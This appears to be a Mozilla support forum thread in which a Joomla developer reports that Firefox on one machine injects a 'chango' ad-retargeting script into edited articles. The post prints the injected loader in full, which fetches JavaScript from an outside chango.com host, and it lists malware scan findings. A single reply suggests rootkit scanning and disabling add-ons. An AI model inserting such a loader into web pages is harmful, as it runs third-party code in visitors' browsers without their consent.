Search Support

Avoid support scams. We will never ask you to call or text a phone number or share personal information. Please report suspicious activity using the “Report Abuse” option.

Learn More

chango worm javascript code insertion

I am a web developer creating multiple sites on the Joomla2.5 platform on a dedicated server. On one of my computers and only one) when editing code in html view using Firefox 14.0, toggling between text and html mode, the following scipt is automatically added to the end of the article code:

<script id="__changoScript" type="text/javascript">// </script>

This happens on any of my sites, when edited on this one computer. It doesn't happen on this computer with Safari or Chrome.

I have removed Firefox and reinstalled - same problem. I ran Malwarebytes..it found and deleted the following:

Registry Keys Detected: 6 HKCR\CLSID\{7d9e1adc-7db1-4eaf-b6c7-7e062074e6be} (PUP.BlekkoSearchBar) -> Quarantined and deleted successfully. HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\vfd-adk (Rootkit.Agent) -> Quarantined and deleted successfully. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SETUP.EXE (PUP.Bundle.Installer.OI) -> Quarantined and deleted successfully. HKCR\bho_project.bho_object (Trojan.BHO) -> Quarantined and deleted successfully. HKCR\bho_project.bho_object.1 (Trojan.BHO) -> Quarantined and deleted successfully. HKLM\SOFTWARE\Google\Chrome\Extensions\kincjchfokkeneeofpeefomkikfkiedl (PUP.FCTPlugin) -> Quarantined and deleted successfully.

But the problem remains...anyone seen something like this or got any suggestions?

Thanks, Andrew

I am a web developer creating multiple sites on the Joomla2.5 platform on a dedicated server. On one of my computers and only one) when editing code in html view using Firefox 14.0, toggling between text and html mode, the following scipt is automatically added to the end of the article code: <script id="__changoScript" type="text/javascript">// <![CDATA[ var __chd__ = {'aid':11079,'chaid':'www_objectify_ca'};(function() { var c = document.createElement('script'); c.type = 'text/javascript'; c.async = true;c.src = ( 'https:' == document.location.protocol ? 'https://z': 'http://p') + '.chango.com/static/c.js'; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(c, s);})(); // ]]></script> This happens on any of my sites, when edited on this one computer. It doesn't happen on this computer with Safari or Chrome. I have removed Firefox and reinstalled - same problem. I ran Malwarebytes..it found and deleted the following: Registry Keys Detected: 6 HKCR\CLSID\{7d9e1adc-7db1-4eaf-b6c7-7e062074e6be} (PUP.BlekkoSearchBar) -> Quarantined and deleted successfully. HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\vfd-adk (Rootkit.Agent) -> Quarantined and deleted successfully. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SETUP.EXE (PUP.Bundle.Installer.OI) -> Quarantined and deleted successfully. HKCR\bho_project.bho_object (Trojan.BHO) -> Quarantined and deleted successfully. HKCR\bho_project.bho_object.1 (Trojan.BHO) -> Quarantined and deleted successfully. HKLM\SOFTWARE\Google\Chrome\Extensions\kincjchfokkeneeofpeefomkikfkiedl (PUP.FCTPlugin) -> Quarantined and deleted successfully. But the problem remains...anyone seen something like this or got any suggestions? Thanks, Andrew

All Replies (1)

If your computer has a rootkit agent, you probably should do a deep cleaning with anti-rootkit software.

Chango says it offers "search retargeting" services to advertisers. Perhaps this has been incorporated into one of your add-ons unique to this installation of Firefox? Try disabling all non-essential extensions here:

orange Firefox button or classic Tools menu > Add-ons > Extensions category